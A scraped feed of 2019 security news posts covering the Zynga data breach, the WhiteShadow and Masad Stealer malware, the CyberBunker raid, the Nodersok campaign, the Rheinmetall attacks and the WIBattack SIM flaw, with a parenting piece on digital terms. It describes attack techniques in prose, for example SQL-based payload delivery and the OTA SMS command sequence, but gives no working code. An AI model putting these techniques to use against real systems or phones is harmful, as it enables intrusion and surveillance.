(SecurityAffairs – google open redirects, phishing)


The post Phishers continue to abuse Adobe and Google Open Redirects appeared first on Security Affairs.

Windows 10 1903 on ARM Gets a Virtualization-based Security Feature

Windows 10 version 1903 on ARM has gotten an additional virtualization-based security feature that creates secured regions of memory that are isolated from the operating system. These secured and isolated regions of memory can then be used by security solutions so that they are better protected from vulnerabilities in the operating s [...]

Week in review: IE zero-day, S3 bucket security, rise of RDP as a target vector

Here’s an overview of some of last week’s most interesting news, articles and podcasts: Cybersecurity automation? Yes, wherever possible Automated systems are invaluable when it comes to performing asset discovery, evaluation and vulnerability remediation, sifting through mountains of data, detecting anomalous activity and, consequently, alleviating the everyday burdens of security teams. How can we thwart email-based social engineering attacks? More than 99 percent of cyberattacks rely on human interaction to work, Proofpoint recently shared. More … More

The post Week in review: IE zero-day, S3 bucket security, rise of RDP as a target vector appeared first on Help Net Security.

Security Affairs newsletter Round 233

A new round of the weekly newsletter arrived! The best news of the week with Security Affairs



Hi folk, let me inform you that I suspended the newsletter service, anyway I’ll continue to provide you a list of published posts every week through the blog.

Once again thank you!

0patch will provide micropatches for Windows 7 and Server 2008 after EoS
Critical flaws affect Jira Service Desk and Jira Service Desk Data Center
Facebook suspends tens of thousands of apps from hundreds of developers
Campbell County Memorial Hospital in Wyoming hit by ransomware attack
Portugues hacker faces hundreds of Charges in Football Leaks case
Portuguese hacker faces hundreds of Charges in Football Leaks case
Privilege Escalation flaw found in Forcepoint VPN Client for Windows
Thinkful forces a password reset for all users after a data breach
TortoiseShell Group targets IT Providers in supply chain attacks
A new Fancy Bear backdoor used to target political targets
APT or not APT? Whats Behind the Aggah Campaign
Hacker discloses details and PoC exploit code for unpatched 0Day in vBulletin
Microsoft released an out-of-band patch to fix Zero-day flaw exploited in the wild
North Korea-linked malware ATMDtrack infected ATMs in India
Adobe Patches two critical vulnerabilities in ColdFusion
Czech Intelligence ‘s report attributes major cyber attack to China
Heyyo dating app left its users data exposed online
US Utilities Targeted with LookBack RAT in a new phishing campaign
Airbus suppliers were hit by four major attack in the last 12 months
Botnet exploits recent vBulletin flaw to protect its bots
Emsisoft releases a free decryptor for the WannaCryFake ransomware
Study shows connections between 2000 malware samples used by Russian APT groups
USBsamurai for Dummies: How To Make a Malicious USB Implant & Bypass Air-Gapped Environments for 10$. The Dumb-Proof Guide.
Checkm8: unpatchable iOS exploit could lead to permanent jailbreak for iOS devices running A5 to A11 chips
DoorDash Data Breach exposes data of approximately 5 million users
Emsisoft released a new free decryption tool for the Avest ransomware
Magecart 5 hacker group targets L7 Routers
After SIMJacker, WIBattack hacking technique disclosed. Billions of users at risk
German police arrest suspects in raid network hosting Darknet marketplaces
Malware-based attacks disrupted operations of Rheinmetall AG and Defence Construction Canada
Nodersok malware delivery campaign relies on advanced techniques

Pierluigi Paganini

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 233 appeared first on Security Affairs.

Security Affairs 2019-09-29 06:48:05

Hackers have stolen more than 218 million records from the popular ‘Words With Friends’ developed by the mobile social game company Zynga Inc.

Do you remember Gnosticplayers? The popular hacker Gnosticplayers that between February and April disclosed the existence of some massive unreported data breaches in five rounds.  He offered for sale almost a billion user records stolen from nearly 45 popular online services.

Now the Pakistani hacker claims to have stolen more than 218 million records from the popular mobile social game company Zynga Inc.

Zynga Inc is an American social game developer running social video game services founded in April 2007, it primarily focuses on mobile and social networking platforms.

Among the online games developed by the company, there are FarmVille, Words With Friends, Zynga Poker, Mafia Wars, and Café World that have over a billion players worldwide.

“Going by the online alias Gnosticplayers, the serial hacker told The Hacker News that this time, he managed to breach “Words With Friends,” a popular Zynga-developed word puzzle game, and unauthorisedly access a massive database of more than 218 million users.” reported The Hacker News.

Gnosticplayers shared a sample of stoled data with The Hacker News, exposed records includes:

  • Names
  • Email addresses
  • Login IDs
  • Hashed passwords, SHA1 with salt
  • Password reset token (if ever requested)
  • Phone numbers (if provided)
  • Facebook ID (if connected)
  • Zynga account ID
Zynga words-with-friends

Gnosticplayers revealed that he had access to data belonging to all Android and iOS game players who installed and signed up for the ‘Words With Friends’ game before 2nd September 2019.

Zynga confirmed that the account login information for certain players of Draw Something and Words With Friends that may have been exposed in the data breach. The company pointed out that hackers did not access financial information.

“We recently discovered that certain player account information may have been illegally accessed by outside hackers.  An investigation was immediately commenced, leading third-party forensics firms were retained to assist, and we have contacted law enforcement.” reads the data breach notification published by the company.

“While the investigation is ongoing, we do not believe any financial information was accessed.  However, we have identified account login information for certain players of Draw Something and Words With Friends that may have been accessed.  As a precaution, we have taken steps to protect these users’ accounts from invalid logins.  We plan to further notify players as the investigation proceeds.”

The hacker also claims to have accessed data of other Zynga gamers, including Draw Something and the discontinued OMGPOP game.

The company launched an investigation and hired third-party forensics firms to help it, of course, it also reported the incident to the law enforcement. As a precaution, the gaming firm has taken steps to protect these users’ accounts from invalid logins.

Users of the Words With Friends game, and let me suggest players of Zynga games, should immediately change the password for their account and also on any other services that share the same credentials.

Pierluigi Paganini

(SecurityAffairs – gaming, hacking)

The post appeared first on Security Affairs.

Exclusive — Hacker Steals Over 218 Million Zynga ‘Words with Friends’ Gamers Data

A Pakistani hacker who previously made headlines earlier this year for selling almost a billion user records stolen from nearly 45 popular online services has now claimed to have hacked the popular mobile social game company Zynga Inc. With a current market capitalization of over $5 billion, Zynga is one of the world's most successful social game developers with a collection of hit online

WhiteShadow downloader leverages Microsoft SQL to retrieve multiple malware

Researchers at Proofpoint have spotted a piece of downloader, dubbed WhiteShadow, that leverages Microsoft SQL queries to pull and deliver malicious payloads. 

In August, malware researchers at Proofpoint spotted a new downloader which is being used to deliver a variety of malware via Microsoft SQL queries. The experts detected new Microsoft Office macros, which collectively act as a staged downloader, and tracked it as WhiteShadow.

Initially the downloader was involved in a small campaign aimed at distributing the Crimson RAT, over the time researchers observed the implementation of detection evasion techniques.

“In August 2019, the macros that make up WhiteShadow appeared in English-language cleartext. The only observed obfuscation technique was in the simple case altering of strings such as “Full_fILE” or “rUN_pATH.” In early September, we observed slight misspellings of certain variables such as “ShellAppzz.Namespace(Unzz).” Mid-September brought another change in macro code using reversed strings such as “StrReverse(“piz.Updates\stnemucoD\”)”.” reads the analysis published by Proofpoint.

“The most recently observed versions of the WhiteShadow macros contain long randomized text strings such as “skjfhskfhksfhksfhksjfh1223sfsdf.eDrAerTerAererer”.”

Experts believe that WhiteShadow is one component of a malware delivery service that includes a rented instance of Microsoft SQL Server to host various payloads retrieved by the downloader. Experts observed the downloader in campaigns spreading Crimson RAT, Agent Tesla, AZORult, and multiple keyloggers.

The macros observed in the campaigns, once enables, execute SQL queries to retrieve the malicious code, stored as ASCII-encoded strings, from Microsoft SQL Server databases controlled by threat actors. 

The result of the query is written to disk as a PKZip archive of a Windows executable. 

WhiteShadow uses a SQLOLEDB connector to connect to a remote Microsoft SQL Server instance, execute a query, and save the results to a file in the form of a zipped executable. The SQLOLEDB connector is an installable database connector from Microsoft but is included by default in many (if not all) installations of Microsoft Office.” continues the report.

“Once extracted by the macro, the executable is run on the system to start installing malware, which is determined by the actor based on the script configuration stored in the malicious Microsoft Office attachments.”

whiteshadow

Proofpoint warns that the Microsoft SQL technique is still a rarity in the threat landscape, but threat actors could increasingly adopt it in future campaigns. 

Pierluigi Paganini

(SecurityAffairs – WhiteShadow, malware)

The post WhiteShadow downloader leverages Microsoft SQL to retrieve multiple malware appeared first on Security Affairs.

Masad Stealer Malware exfiltrates data via Telegram

Experts at Juniper Threat Labs have discovered a new piece of malware dubbed Masad Stealer that exfiltrates cryptocurrency wallet files via Telegram.

Security researchers at the Juniper Threat Labs discovered a strain of malware dubbed Masad Stealer that is actively distributed. The malware could steals files, browser information, and cryptocurrency wallet data and send them to the botmasters using a Telegram.

“The malware is being advertised on black market forums as “Masad Clipper and Stealer”. It steals browser data, which might contain usernames, passwords and credit card information. Masad Stealer also automatically replaces cryptocurrency wallets from the clipboard with its own.” reads the analysis published by the experts.

Masad Stealer sends all of the information it collects – and receive commands from – a Telegram bot controlled by the threat actor deploying that instance of Masad. Because Masad is being sold as off-the-shelf malware, it will be deployed by multiple threat actors who may or may not be the original malware writers.”

The Masad Stealer is written in Autoit scripts and is compiled into a Windows executable. The size of most of the samples analyzed by the experts was about 1.5 MiB, but experts revealed that it is possible to find larger executables bundled into other applications. 

The malware appears to be linked to another threat dubbed “Qulab Stealer”. 

Crooks are advertising the malware on hacking forums as a stealer and clipper, the ‘fully-featured’ variant is offered for sale at $85.

Masad Stealer is distributed masquerading it as a legitimate tool or bundling it into third party tools, such as CCleaner and ProxySwitcher.

Attackers attempt to trick users into downloading the malware by advertising it in forums, on third party download sites or on file sharing sites.

Victims can also get infected installing tainted versions of popular software and game cracks, and cheats.

Once infected a machine, Masad Stealer will collect a wide range of data, including system info, screenshots, desktop text files, Steam Desktop Authenticator sessions, Cryptocurrency Wallets, browser cookies, usernames, passwords, and Credit Card Browser Data.

Masad Stealer is also able to automatically replaces MoneroBitcoin Cash, Litecoin, Neo, and Web Money cryptocurrency wallets from the clipboard with its own.

The malware achieves persistence by creating a scheduled task on all Windows devices it manages. 

Once the malware has collected the information from the victims’ computers will zip them using a 7zip executable bundled within its binary, then it will exfiltrat the data to the command and control (C2) server using unique Telegram bot IDs.

The analysis of unique Telegram bot IDs and usernames associated to the malware allowed the experts to determine that there are at least 18 threat actors or campaigns actively targeting potential victims with the Masad Stealer.

“Of the more than 1,000 samples we identified to be variants of this malware, there where 338 unique Telegram Command and Control bot IDs. From this data, we can estimate the number of threat actors – or at least the number of different campaigns being run using the Masad Stealer malware – and the size of their operations.” continues the report.

Juniper Threat Labs pointed out that Masad Stealer is an active threat and the malicious code is still available for purchase on the black market.

Experts also published a list of indicators of compromise (IOCs) with malware sample hashes and domains involved in the attacks.

Pierluigi Paganini

(SecurityAffairs – hacking, malware)

The post Masad Stealer Malware exfiltrates data via Telegram appeared first on Security Affairs.

Learn Kali Linux The Easy Way Getting Started With Kali Linux

Learn Kali Linux The Easy Way Getting Started With Kali Linux Learn Kali Linux: Welcome to HackingVision, you have installed Kali Linux and you’re wondering how to use some of the popular and powerful tools included in the Kali Linux Operating System. Don’t worry we have put together some tips and tutorials to help you ... Read moreLearn Kali Linux The Easy Way Getting Started With Kali Linux

The post Learn Kali Linux The Easy Way Getting Started With Kali Linux appeared first on HackingVision.

German Cops Raid “Cyberbunker 2.0,” Arrest 7 in Child Porn, Dark Web Market Sting

German authorities said Friday they’d arrested seven people and were investigating six more in connection with the raid of a Dark Web hosting operation that allegedly supported multiple child porn, cybercrime and drug markets with hundreds of servers buried inside a heavily fortified military bunker. Incredibly, for at least two of the men accused in the scheme, this was their second bunker-based hosting business that was raided by cops and shut down for courting and supporting illegal activity online.

The latest busted cybercrime bunker is in Traben-Trarbach, a town on the Mosel River in western Germany. The Associated Press says investigators believe the 13-acre former military facility served a number of dark web sites, including: the “Wall Street Market,” a sprawling, online bazaar for drugs, hacking tools and financial-theft wares before it was taken down earlier this year; the drug portal “Cannabis Road;” and the synthetic drug market “Orange Chemicals.”

German police reportedly seized $41 million worth of funds allegedly tied to these markets, and more than 200 servers that were operating throughout the underground temperature-controlled, ventilated and closely guarded facility.

The former military bunker in Germany that housed CyberBunker 2.0 and, according to authorities, plenty of very bad web sites.

The authorities in Germany haven’t named any of the people arrested or under investigation in connection with CyberBunker’s alleged activities, but said those arrested were apprehended outside of the bunker. Still, there are clues in the details released so far, and those clues have been corroborated by sources who know two of the key men allegedly involved.

We know the owner of the bunker hosting business has been described in media reports as a 59-year-old Dutchman who allegedly set it up as a “bulletproof” hosting provider that would provide Web site hosting to any business, no matter how illegal or unsavory.

We also know the German authorities seized at least two Web site domains in the raid, including the domain for ZYZTM Research in The Netherlands (zyztm[.]com), and cb3rob[.]org.

A “seizure” placeholder page left behind by German law enforcement agents after they seized cb3rob.org, an affiliate of the the CyberBunker bulletproof hosting facility owned by convicted Dutch cybercriminal Sven Kamphuis.

According to historic whois records maintained by Domaintools.com, Zyztm[.]com was originally registered to a Herman Johan Xennt in the Netherlands. Cb3rob[.]org was an organization hosted at CyberBunker registered to Sven Kamphuis, a self-described anarchist who was convicted several years ago for participating in a large-scale attack that briefly impaired the global Internet in some places.

Both 59-year-old Xennt and Mr. Kamphuis worked together on a previous bunker-based project — a bulletproof hosting business they sold as “CyberBunker” and ran out of a five-story military bunker in The Netherlands.

That’s according to Guido Blaauw, director of Disaster-Proof Solutions, a company that renovates and resells old military bunkers and underground shelters. Blaauw’s company bought the 12,500 square-meter Netherlands bunker from Mr. Xennt in 2011 for $700,000.

Guido Blaauw, in front of the original CyberBunker facility in the Netherlands, which he bought from Mr. Xennt in 2011. Image: Blaauw.

Media reports indicate that in 2002 a fire inside the CyberBunker 1.0 facility in The Netherlands summoned emergency responders, who discovered a lab hidden inside the bunker that was being used to produce the drug ecstasy/XTC.

Blaauw said nobody was ever charged for the drug lab, which was blamed on another tenant in the building. Blauuw said Xennt and others in 2003 were then denied a business license to continue operating in the bunker, and they were forced to resell servers from a different location — even though they bragged to clients for years to come about hosting their operations from an ultra-secure underground bunker.

“After the fire in 2002, there was never any data or servers stored in the bunker,” in The Netherlands, Blaauw recalled. “For 11 years they told everyone [the hosting servers where] in this ultra-secure bunker, but it was all in Amsterdam, and for 11 years they scammed all their clients.”

Firefighters investigating the source of a 2002 fire at the CyberBunker’s first military bunker in The Netherlands discovered a drug lab amid the Web servers. Image: Blaauw.

Blaauw said sometime between 2012 and 2013, Xennt purchased the bunker in Traben-Trarbach, Germany — a much more modern structure that was built in 1997. CyberBunker was reborn, and it began offering many of the same amenities and courted the same customers as CyberBunker 1.0 in The Netherlands.

“They’re known for hosting scammers, fraudsters, pedophiles, phishers, everyone,” Blaauw said. “That’s something they’ve done for ages and they’re known for it.”

The former Facebook profile picture of Sven Olaf Kamphuis, shown here standing in front of Cyberbunker 1.0 in The Netherlands.

About the time Xennt and company were settling into their new bunker in Germany, he and Kamphuis were engaged in a fairly lengthy and large series of distributed denial-of-service (DDoS) attacks aimed at sidelining a number of Web sites — particularly anti-spam organization Spamhaus. A chat record of that assault, detailed in my 2016 piece, Inside the Attack that Almost Broke the Internet, includes references to and quotes from both Xennt and Kamphuis.

Kamphuis was later arrested in Spain on the DDoS attack charges. He was convicted in The Netherlands and sentenced to time served, which was approximately 55 days of detention prior to his extradition to the United States.

Some of the 200 servers seized from CyberBunker 2.0, a “bulletproof” web hosting facility buried inside a German military bunker. Image: swr.de.

The AP story mentioned above quoted German prosecutor Juergen Bauer saying the 59-year-old main suspect in the case was believed to have links to organized crime.

A 2015 expose’ (PDF) by the Irish newspaper The Sunday World compared Mr. Xennt (pictured below) to a villain from a James Bond movie, and said he has been seen frequently associating with another man: an Irish mobster named George “the Penguin” Mitchell, listed by Europol as one of the top-20 drug traffickers in Europe and thought to be involved in smuggling heroin, cocaine and ecstasy.

Cyberbunkers 1.0 and 2.0 owner and operator Mr. Xennt, top left, has been compared to a “Bond villain.” Image: The Sunday World, July 26, 2015.

Blaauw said he doesn’t know whether Kamphuis was arrested or named in the investigation, but added that people who know him and can usually reach him have not heard from Kamphuis over several days.

Here’s what the CyberBunker in The Netherlands looked like back in the early aughts when Xennt still ran it:

Here’s what it looks like now after being renovated by Blaauw’s company and designed as a security operations center (SOC):

The former CyberBunker in the Netherlands, since redesigned as a security operations center by its current owner. Image: Blaauw.

I’m glad when truly bad guys doing bad stuff like facilitating child porn are taken down. The truth is, almost anyone trafficking in the kinds of commerce these guys courted also is building networks of money laundering business that become very tempting to use or lease out for other nefarious purposes, including human trafficking, and drug trafficking.

Nodersok malware delivery campaign relies on advanced techniques

Microsoft researchers observed a campaign delivering malware, dubbed Nodersok, relying on advanced techniques and elusive network infrastructure.

Microsoft experts observed a malware campaign, tracked as Nodersok, relying on advanced techniques and elusive network infrastructure. Microsoft uncovered the campaign in mid-July when noticed patterns in the anomalous usage of MSHTA.exe.

Nodersok abuse of legitimate tools also called living-off-the-land binaries (LOLBins). Researchers observed threat actors dropping two legitimate tools onto the infected machines, namely Node.exe, the Windows implementation of the popular Node.js framework, and WinDivert, a network packet capture and manipulation utility.

“It’s not uncommon for attackers to download legitimate third-party tools onto infected machines (for example, PsExec is often abused to run other tools or commands).” reads the analysis published by Microsoft. “However, Nodersok went through a long chain of fileless techniques to install a pair of very peculiar tools with one final objective: turn infected machines into zombie proxies.”

The Nodersok campaign has already infected thousands of machines in the last several weeks. Most of the victims are located in the United States and Europe, they are predominantly consumers. About 3% of the infected systems belong to organizations in different sectors, including education, professional services, healthcare, finance, and retail.

Nodersok campaign

The attack chain starts when the users run an HTML Application (HTA) that is delivered likely through compromised advertisements. The JavaScript code in the HTA file downloads a second state component that launches a Powershell.

The Powershell command downloads additional components. One of the second-stage instances of PowerShell downloads the legitimate node.exe tool, while another drops WinDivert packet capture library components.

Another PowerShell component runs a shellcode to use WinDivert for the filtering and modification of certain outgoing packets.

The final payload turns the infected machine into a proxy.

The attackers leverage lksktWinDivert tool is used to intercept packets sent out to initiate a TCP connection and modify them in a manner that likely benefits the attackers.

“Both the distributed network infrastructure and the advanced fileless techniques allowed this campaign fly under the radar for a while, highlighting how having the right defensive technologies is of utmost importance in order to detect and counter these attacks in a timely manner.” Microsoft concludes.

“If we exclude all the clean and legitimate files leveraged by the attack, all that remains are the initial HTA file, the final Node.js-based payload, and a bunch of encrypted files. Traditional file-based signatures are inadequate to counter sophisticated threats like this.”

Pierluigi Paganini

(SecurityAffairs – Nodersok, hacking)

The post Nodersok malware delivery campaign relies on advanced techniques appeared first on Security Affairs.

5 Digitally-Rich Terms to Define and Discuss with Your Kids

online privacy

Over the years, I’ve been the star of a number of sub-stellar parenting moments. More than once, I found myself reprimanding my kids for doing things that kids do — things I never stopped to teach them otherwise.

Like the time I reprimanded my son for not thanking his friend’s mother properly before we left a birthday party. He was seven when his etiquette deficit disorder surfaced. Or the time I had a meltdown because my daughter cut her hair off. She was five when she brazenly declared her scorn for the ponytail.

The problem: I assumed they knew.

Isn’t the same true when it comes to our children’s understanding of the online world? We can be quick to correct our kids when they fail to exercise the best judgment or handle a situation the way we think they should online.

But often what’s needed first is a parental pause to ask ourselves: Am I assuming they know? Have I taken the time to define and discuss the issue?

With that in mind, here are five digitally-rich terms dominating the online conversation. If possible, find a few pockets of time this week and start from the beginning — define the words, then discuss them with your kids. You may be surprised where the conversation goes.

5 digital terms that matter

Internet Privacy

Internet privacy is the personal privacy that every person is entitled to when they display, store, or provide information regarding themselves on the internet. 

Highlight: We see and use this word often but do our kids know what it means? Your personal information has value, like money. Guard it. Lock it down. Also, respect the privacy of others. Be mindful about accidentally giving away a friend’s information, sharing photos without permission, or sharing secrets. Remember: Nothing shared online (even in a direct message or private text) is private—nothing. Smart people get hacked every day.
Ask: Did you know that when you go online, websites and apps track your activity to glean personal information? What are some ways you can control that? Do you know why people want your data?
Act: Use privacy settings on all apps, turn off cookies in search engines, review privacy policies of apps, and create bullet-proof passwords.

Digital Wellbeing

Digital wellbeing (also called digital wellness) is an ongoing awareness of how social media and technology impacts our emotional and physical health.

Highlight: Every choice we make online can affect our wellbeing or alter our sense of security and peace. Focusing on wellbeing includes taking preventative measures, making choices, and choosing behaviors that build help us build a healthy relationship with technology. Improving one’s digital wellbeing is an on-going process.
Ask: What do you like to do online that makes you feel good about yourself? What kinds of interactions make you feel anxious, excluded, or sad? How much time online do you think is healthy?
Act:
Digital wellness begins at home. To help kids “curb the urge” to post so frequently, give them a “quality over quantity” challenge. Establish tech curfews and balance screen time to green time. Choose apps and products that include wellbeing features in their design. Consider security software that blocks inappropriate apps, filters disturbing content, and curbs screen time.

Media Literacy

Media literacy is the ability to access, analyze, evaluate, and create media in a variety of forms. It’s the ability to think critically about the messages you encounter.

Highlight: Technology has redefined media. Today, anyone can be a content creator and publisher online, which makes it difficult to discern the credibility of the information we encounter. The goal of media literacy curriculum in education is to equip kids to become critical thinkers, effective communicators, and responsible digital citizens.
Ask: Who created this content? Is it balanced or one-sided? What is the author’s motive behind it? Should I share this?  How might someone else see this differently?
Act: Use online resources such as Cyberwise to explore concepts such as clickbait, bias, psychographics, cyberethics, stereotypes, fake news, critical thinking/viewing, and digital citizenship. Also, download Google’s new Be Internet Awesome media literacy curriculum.

Empathy

Empathy is stepping into the shoes of another person to better understand and feel what they are going through.

Highlight: Empathy is a powerful skill in the online world. Empathy helps dissolve stereotypes, perceptions, and prejudices. According to Dr. Michelle Borba, empathetic children practice these nine habits that run contrary to today’s “selfie syndrome” culture. Empathy-building habits include moral courage, kindness, and emotional literacy. Without empathy, people can be “mean behind the screen” online. But remember: There is also a lot of people practicing empathy online who are genuine “helpers.” Be a helper.
Ask: How can you tell when someone “gets you” or understands what you are going through? How do they express that? Is it hard for you to stop and try to relate to what someone else is feeling or see a situation through their eyes? What thoughts or emotions get in your way?
Act:  Practice focusing outward when you are online. Is there anyone who seems lonely, excluded, or in distress? Offer a kind word, an encouragement, and ask questions to learn more about them. (Note: Empathy is an emotion/skill kids learn over time with practice and parental modeling).

Cyberbullying

Cyberbullying is the use of technology to harass, threaten, embarrass, shame, or target another person online.

Highlight: Not all kids understand the scope of cyberbullying, which can include spreading rumors, sending inappropriate photos, gossiping, subtweeting, and excessive messaging. Kids often mistake cyberbullying for digital drama and overlook abusive behavior. While kids are usually referenced in cyberbullying, the increase in adults involved in online shaming, unfortunately, is quickly changing that ratio.
Ask: Do you think words online can hurt someone in a way, more than words said face-to-face? Why? Have you ever experienced cyberbullying? Would you tell a parent or teacher about it? Why or why not?
Act: Be aware of changes in your child’s behavior and pay attention to his or her online communities. Encourage kids to report bullying (aimed at them or someone else). Talk about what it means to be an Upstander when bullied. If the situation is unresolvable and escalates to threats of violence, report it immediately to law enforcement.

We hope these five concepts spark some lively discussions around your dinner table this week. Depending on the age of your child, you can scale the conversation to fit. And don’t be scared off by eye rolls or sighs, parents. Press into the hard conversations and be consistent. Your voice matters in their noisy, digital world.

The post 5 Digitally-Rich Terms to Define and Discuss with Your Kids appeared first on McAfee Blogs.

German police arrest suspects in raid network hosting Darknet marketplaces

German police have shut down a network hosting Darknet marketplaces focused on the trading of drugs, stolen data and child pornography.

German police announced to have shut down a network hosting Darknet black marketplaces trading drugs, stolen data, and child pornography.

The black marketplaces were also offering stolen data and fake documents, and other illegal goods.

Authorities conducted an investigation on the operators of the “Bulletproof Hoster” service that was provided through servers hidden in a former NATO bunker, the so-called “Cyber Bunker.”

Law enforcement arrested seven suspects were arrested in a series of raids, four Dutch citizens, two Germans and one Bulgarian.

“Thursday’s raids involved hundreds of officers and came after years of following up on leads in cooperation with other agencies. Police believe that the data center was involved in a hack attack three years ago on the national communications provider, Telekom.” reported the DW agency.

“Officials said the server seized on Thursday had also hosted the second-largest darknet trading platform, Wall Street Market.  Authorities in the European Union and the US shut that platform down in May, claiming it was used to traffick stolen data, forged documents, computer malware and illicit drugs.”

According to prosecutors, the criminal ring behind the illegal network was composed at least thirteen members, 12 men and one woman, aged from 20 to 59. The suspects ran the powerful servers inside the former NATO bunker in the town of Traben-Trarbach in Rhineland-Palatinate state.

The operation involved hundred police agents in Germany and other European countries, they seized 200 servers, numerous data carriers and mobile phones and a large sum of cash.

The police also confirmed that the popular “Wall Street Market” black marketplace was hosted on the seized server. In May, the German police, with the support of Europol, Dutch police and the FBI, has shut down one of the world’s largest black marketplace in the darkweb, the ‘Wall Street Market,’ and arrested three operators allegedly running it. The three German nation suspects were arrested on April 23 and 24 in the states of Hesse, Baden-Wuerttemberg and North Rhine-Westphalia.

The operation also allowed to arrest of two major suppliers of illegal narcotics in the United States.

Prosecutors also revealed that the same cyber bunker was used to host the C2 behind a botnet involved in a massive attack that hit the German provider Deutsche Telekom in November 2016.

Pierluigi Paganini

(SecurityAffairs – darknet, hacking)

The post German police arrest suspects in raid network hosting Darknet marketplaces appeared first on Security Affairs.

Malware-based attacks disrupted operations of Rheinmetall AG and Defence Construction Canada

A series of cyber attacks hit the defense contractors Rheinmetall AG and Defence Construction Canada (DCC) causing the disruption of their information technology systems.

This month a series of cyber attack hit defense contractors Rheinmetall AG and Defence Construction Canada (DCC) disrupting their information technology systems.

German Rheinmetall AG is a market leader in the supply of military technology, in 2019 the group generated sales of $6.9 billion. DCC is a Crown corporation that delivers infrastructure and environmental projects for the defence of Canada

A malware-based attacks hit the IT infrastructure of Rheinmetall Automotive plants in Brazil, Mexico, and the USA since late on the evening of 24 September 2019.

The attacks impacted the production processes at these plants causing significant disruption.

“The IT infrastructure of Rheinmetall Automotive plants in Brazil, Mexico and the USA has been affected by malware attacks since late on the evening of 24 September 2019. As a result, normal production processes at these locations are currently experiencing significant disruption.” reads a press release published by the company.

“According to the latest information, the Group’s other IT systems have not been affected.”

Rheinmetall AG claims it is doing everything in its power to address the resulting disruption.

The company said assured deliverability in the short term, but at the time it is not possible to predict the length of the disruption.

“The most likely scenarios suggest a period lasting between two and four weeks.” continues the press release. “As things stand, the Group expects the malware event to have an adverse impact on operating results of between €3 million and €4 million per week starting with week two.”

Early this month, a cyberattack also disrupted the information technology systems of Defence Construction Canada.

“The Crown Corporation that manages Defence department projects and infrastructure has been hit with a cyber-attack.” reported the Ottawa Sun interview.

“Industry sources say an attack earlier this month disrupted Defence Construction Canada’s computer systems and has led to ongoing issues with procurement and other projects.”

DCC is still working to restore the IT systems and launched an investigation in the cyber attack, the organization pointed out that there are no delays to projects that it is managing on behalf of DND.

“All DCC site offices across Canada are open and work has continued on all projects that DCC is managing on behalf of DND and its other clients, she noted in an email.” continues the post.

“There are no delays to projects that DCC is managing on behalf of DND due to this incident,” said Stephanie Ryan, director of communications with Defence Construction Canada.

At the time there are no technical details about both cyber attacks, experts believe that the systems were infected by ransomware that caused the disruption of internal operations.

Pierluigi Paganini

(SecurityAffairs – Rheinmetall, hacking)

The post Malware-based attacks disrupted operations of Rheinmetall AG and Defence Construction Canada appeared first on Security Affairs.

After SIMJacker, WIBattack hacking technique disclosed. Billions of users at risk

Researchers are warning of a new variant of recently disclosed SimJacker attack, dubbed WIBattack, that could expose millions of mobile phones to remote hacking.

WIBattack is a new variant of the recently discovered Simjacker attack method that could expose millions of mobile phones to remote hacking.

A couple of weeks ago, cybersecurity researchers at AdaptiveMobile Security disclosed a critical vulnerability in SIM cards dubbed SimJacker that could be exploited by remote attackers to compromise targeted mobile phones and spy on victims just by sending an SMS.

The SimJacker vulnerability resides in the S@T (SIMalliance Toolbox) Browser dynamic SIM toolkit that is embedded in most SIM cards used by mobile operators in at least 30 countries. The experts discovered that that the exploitation of the vulnerability is independent of the model of phone used by the victim.

The scary part of the story is that a private surveillance firm was aware of the zero-day flaw since at least two years and is actively exploiting the SimJacker vulnerability to spy on mobile users in several countries.

Following the disclosure of the Simjacker attack, the researcher Lakatos from Ginno Security Lab discovered that another dynamic SIM toolkit, called Wireless Internet Browser (WIB), can be exploited in a similar way.

Lakatos first discovered this vulnerability back in 2015, but he did not publicly disclose the flaw is hard to patch and it could be abused by threat actors to remotely take over the phones running vulnerable SIMs.

“We researched security in simcard and discovered the vulnerability in WIB simcard-browser that causes serious harm to hundreds of millions of telecom subscribers worldwide in 2015, and the vulnerability has not ever been published yet.” reads a blog post published by the researcher.

“We researched security in simcard and discovered the vulnerability in WIB simcard-browser that causes serious harm to hundreds of millions of telecom subscribers worldwide in 2015, and the vulnerability has not ever been published yet.

By sending a malicious SMS to victim phone number, attacker can abuse the vulnerabilities in the WIB sim browser to remotely take control of the victim mobile phone to perform harmful actions such as: send sms, make phone call, get victim’s location, launch other browsers (e.g WAP browser), get victim’s IMEI, etc.”

The researcher also claimed to have discovered the flaw in S@T Browser and disclosed a video PoC of the Simjacker with details that have not yet been published by AdaptiveMobile Security researchers.

The flaw in both S@T and WIB Browsers can be exploited to perform several malicious tasks by sending an SMS containing a spyware-like code.

Back to the WIBattack, the WIB toolkit was created by SmartTrust, a company that provides SIM toolkit-based browsing solutions hundreds of mobile operators worldwide, including AT&T, Etisalat, KPN, TMobile, Telenor, and Vodafone.

Like the S@T Browser, WIB toolkit has also been designed to allow mobile carriers to provide some essential services, subscriptions, and value-added services over-the-air to the customers. It also allows changing core network settings on their devices.

“OTA is based on client/server architecture where at one end there is an operator back-end system (customer care, billing system, application server…) and at the other end there is a SIM card,” continues the researcher.

The flaw in the WIB toolkit could be exploited to:

  • Retrieve the target device’ location and IMEI
  • Send fake messages on behalf of victims,
  • Distribute malware by launching victim’s phone browser and visiting a malicious web page
  • dial premium-rate numbers
  • Call the attacker’s phone number to spy on victims’ surroundings via the device’s microphone
  • Perform denial of service attacks by disabling the SIM card
  • Retrieving target device info (i.e language, radio type, battery level, etc.)

Below the attack scenario described by the expert:

WIBAttack

(1) Attacker sends a malicious OTA SMS to the victim phone number. The OTA SMS contains WIB command such as: SETUP CALL, SEND SMS, PROVIDE LOCATION INFO, etc.

(2) Right after receiving the OTA SMS, Baseband Operating System of the victim mobile phone uses ENVELOP COMMAND ( an APDU command to communicate between mobile phone and simcard) to forward the TPDU of the OTA SMS to WIB browser in victim’s simcard. Different from the procedure of receiving the normal text sms, the procedure OTA SMS is silently handled just in baseband operating system and does not raise any alert to application operating system (android os, ios, blackberry os, …). Neither feature phone nor smart phone raises alert about the procedure of ota sms: no ringing, no vibration, no detection from users.

(3) WIB browser follows the WIB commands inside the TPDU of OTA SMS and sends the corresponding PROACTIVE COMMAND to the victim mobile phone such as: SETUP CALL, SEND SMS, PROVIDE LOCATION INFO.

(4) The victim mobile phone follows the PROACTIVE COMMAND received from victim’s simcard to perform the corresponding actions such as: make a phone call, send an sms to whatever phone number attacker wants (e.g receiver mobile phone in the figure).

The researcher published a video PoC of the attack:

Lakatos shared his findings on WIBAttack with the GSM Association (GSMA).
